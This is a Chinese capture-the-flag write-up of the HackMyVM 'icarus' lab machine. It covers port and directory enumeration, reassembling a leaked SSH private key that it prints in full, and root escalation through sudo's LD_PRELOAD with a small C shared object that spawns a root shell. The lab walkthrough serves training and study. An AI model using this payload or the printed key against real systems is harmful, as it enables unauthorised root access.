news 2026/6/10 15:28:06

【打靶日记】HackMyVm 之 icarus

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
【打靶日记】HackMyVm 之 icarus

主机发现

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# arp-scan -I eth1 -l192.168.56.146 08:00:27:d5:6a:34 PCS Systemtechnik GmbH

主机地址为:192.168.56.146

端口扫描

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# nmap -p- 192.168.56.146PORT STATE SERVICE22/tcpopenssh80/tcpopenhttp

80端口探测

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146<!doctype html><htmllang="en"><title>LOGIN</title><formclass="form-signin"action="check.php"method="post"><inputtype="text"autocomplete="off"id="user"name="user"name="user"placeholder="Username"required autofocus><inputtype="password"name="password"id="password"placeholder="Password"required><inputtype="submit"value="Sign in"></form></body></html>

一个表单登录

目录枚举

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# dirsearch -u http://192.168.56.146[00:51:36]Starting:[00:51:41]200- 9KB - /a[00:51:51]200- 21B - /check.php[00:52:02]302- 0B - /login.php ->index.php[00:52:23]200- 1B - /xml Task Completed

收集泄露信息

访问

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146/aa xaa xab(....)xzbta xzbtb xzbtc ┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146/check.phpMan, youmakeme cry. ┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146/xmlK

随便测试几个,发现有返回结果

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146/xaa- ┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146/xab- ┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146/xzabcO

获取id_rsa

#获取数据,清洗第一行的a,获取id_rsa┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146/a > dir.txt% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed10096411009641001752k0--:--:-- --:--:-- --:--:-- 1883k ┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# cat dir.txt| wc -l1825┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# tail -1823 dir.txt > dir2.txt┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# for i in $(cat dir2.txt);do curl 192.168.56.146/$i >> id; done

查看id文件

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# cat id-----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn NhAAAAAwEAAQAAAQEA5xagxLiN5ObhPjNcs2I2ckcYrErKaunOwm40kTBnJ6vrbdRYHteS afNWC6xFFzwO77+Kze229eK4ddZcwmU0IdN02Y8nYrxhl8lOc+e5T0Ajz+tRmLGoxJVPsS TzKBERlWpKuJoGO/CEFLOv6PP6s79YYzZFpdUjaczY96jgICftzNZS+VkBXuLjKr79h4Tw z7BK4V6FEQY0hwT8NFfNrF3x3VPe0UstdiUJFl4QV/qAPlHVhPd0YUEPr/95mryjuGi1xw P7xVFrYyjLfPepqYHiS5LZxFewLWhhSjBOI0dzf/TwiNRnVGTZhB3GemgEIQRAam26jkZZ 3BxkrUVckQAAA8jfk7Jp35OyaQAAAAdzc2gtcnNhAAABAQDnFqDEuI3k5uE+M1yzYjZyRx isSspq6c7CbjSRMGcnq+tt1Fge15Jp81YLrEUXPA7vv4rN7bb14rh11lzCZTQh03TZjydi vGGXyU5z57lPQCPP61GYsajElU+xJPMoERGVakq4mgY78IQUs6/o8/qzv1hjNkWl1SNpzN j3qOAgJ+3M1lL5WQFe4uMqvv2HhPDPsErhXoURBjSHBPw0V82sXfHdU97RSy12JQkWXhBX +oA+UdWE93RhQQ+v/3mavKO4aLXHA/vFUWtjKMt896mpgeJLktnEV7AtaGFKME4jR3N/9P CI1GdUZNmEHcZ6aAQhBEBqbbqORlncHGStRVyRAAAAAwEAAQAAAQEAvdjwMU1xfTlUmPY3 VUP9ePsBwSIck6ML8t35H8KFLKln3C4USxpNNe/so+BeTo1PtBVHYpDFu9IMOvrl7+qW3q dLGyUpdUtQXhPK+RvJONt30GwB+BEUlpQYCW9SuHr1WCwfwPMA5iNdT2ijvx0ZvKwZYECJ DYlB87yQDz7VCnRTiQGP2Mqiiwb7vPd/t386Y+cAz1cVl7BnHzWWJTUTkKCwijnvjYrD0o tTQX4sGd6CrI44g+L8hnYuCZz+a0j6IyUfXJqj6l+/Z2Af7pJjbJD3P28xX7eY0h1Cec2l /sb7qg2wy0qJNywJ35l8bZzZKjkXztPLOqMFQ6Fh0BqSdQAAAIEAlaH0ZEzJsZoR3QqcKl xRKjVcuQCwcrKlNbJu2qRuUG812CLb9jJxJxacJPBV0NS832c+hZ3BiLtA5FwCiGlGq5m5 HS3odf3lLXDfIK+pur4OWKBNLDxKbqi4s4M05vR4gHkmotiH9eWlCNuqL46Ip5H1vFXeJM pLRLN0gqOGuQQAAACBAPfffuhidAgUZH/yTvATKC5lcGrE7bkpOq+6XMMgxEQl0Hzry76i rGXkhTY4QUtthYo4+g7jiDzKlbeaS7aN8RYq38GzQnZZQcSdvL1yB/N554gQvzJLvmKQbm gLhMRcdDmifUelJYXib2Mjg/BLaRXaEzOomUKR2nyJH7VgU+xzAAAAgQDuqkBp44indqhx wrzbfeLnzQqpZ/rMZXGcvJUttECRbLRfohUftFE5J0PKuT8w0dpacNCVgkT9A0Tc3xRfky ECBQjeKLvdhcufJhQl0pdXDt1cpebE50LE4yHc8vR6FEjhR4P2AbGICJyRS7AX7UnrOWdUIE3FeNP0r5UiSDq16wAAAA1pY2FydXNAaWNhcnVzAQIDBA==-----END OPENSSH PRIVATE KEY-----

获取用户名

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# chmod 600 id┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# ssh-keygen -y -f idssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnFqDEuI3k5uE+M1yzYjZyRxisSspq6c7CbjSRMGcnq+tt1Fge15Jp81YLrEUXPA7vv4rN7bb14rh11lzCZTQh03TZjydivGGXyU5z57lPQCPP61GYsajElU+xJPMoERGVakq4mgY78IQUs6/o8/qzv1hjNkWl1SNpzNj3qOAgJ+3M1lL5WQFe4uMqvv2HhPDPsErhXoURBjSHBPw0V82sXfHdU97RSy12JQkWXhBX+oA+UdWE93RhQQ+v/3mavKO4aLXHA/vFUWtjKMt896mpgeJLktnEV7AtaGFKME4jR3N/9PCI1GdUZNmEHcZ6aAQhBEBqbbqORlncHGStRVyR icarus@icarus

登录icarus

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# ssh icarus@192.168.56.146 -i idicarus@icarus:~$iduid=1000(icarus)gid=1000(icarus)groups=1000(icarus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

成功获得icarus用户权限

user.txt

icarus@icarus:~$catuser.txt Dontgotothesun

提权

icarus@icarus:~$sudo-l Matching Defaults entriesforicarus on icarus: env_reset, mail_badpass,env_keep+=LD_PRELOAD,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User icarus may run the following commands on icarus:(ALL:ALL)NOPASSWD: /usr/bin/id

其中有"env_keep+=LD_PRELOAD"

┌──(root㉿xhh)-[~/Desktop/some/setenv] └─# cat pe.c #include<stdio.h> #include<sys/types.h> #include<stdlib.h> #include<unistd.h> void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); }

编译好pe.so文件

icarus@icarus:~$lsflag.sh pe.so user.txt icarus@icarus:~$sudoLD_PRELOAD=./pe.soidroot@icarus:/home/icarus# iduid=0(root)gid=0(root)groups=0(root)

成功获得root用户权限

其中,sudo的版本为“Sudo version 1.8.27”,靶机版本sudo过低,存在CVE-2021-3156

root.txt

root@icarus:~# cat root.txtRIPicarus
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/10 13:31:39

Laravel Telescope 与大数据集的内存管理

在开发 Laravel 应用时,我们经常会遇到一些性能瓶颈,其中内存使用是一个常见的问题。特别是在处理大数据集时,如果不加以管理,可能会导致内存溢出。本文将通过一个实际案例,探讨如何在使用 Laravel Telescope 时有效管理内存。 问题描述 最近在使用 Laravel 10 版本的应…

作者头像 李华
网站建设 2026/5/30 20:03:08

JavaFX中区分回车键与小键盘回车键的实践

在开发JavaFX应用程序时,处理键盘事件是常见任务之一,尤其是在需要区分不同来源的回车键(如标准回车键和小键盘上的回车键)时,可能会遇到一些挑战。今天,我们将深入探讨如何在JavaFX中准确区分这些键,并提供一个实际的例子来演示。 背景 在JavaFX中,虽然没有直接提供…

作者头像 李华
网站建设 2026/6/10 13:05:46

免费又高效的AI前端方案:推荐几个可搭配LobeChat使用的HTML模板

免费又高效的AI前端方案&#xff1a;推荐几个可搭配LobeChat使用的HTML模板 在AI助手逐渐从“炫技玩具”走向真实业务落地的今天&#xff0c;一个常见的现实问题是&#xff1a;我们明明已经接入了GPT-4、Claude甚至本地部署的Qwen模型&#xff0c;但用户的第一反应却是——“这…

作者头像 李华
网站建设 2026/6/10 13:07:26

9 个文献综述 AI 工具推荐,研究生降重查重率优化攻略

9 个文献综述 AI 工具推荐&#xff0c;研究生降重查重率优化攻略 文献综述的“重担”与“焦虑” 研究生阶段&#xff0c;论文写作是绕不开的一道门槛。尤其是面对文献综述这一环节时&#xff0c;许多同学常常感到力不从心。文献综述不仅仅是对已有研究成果的梳理&#xff0c;更…

作者头像 李华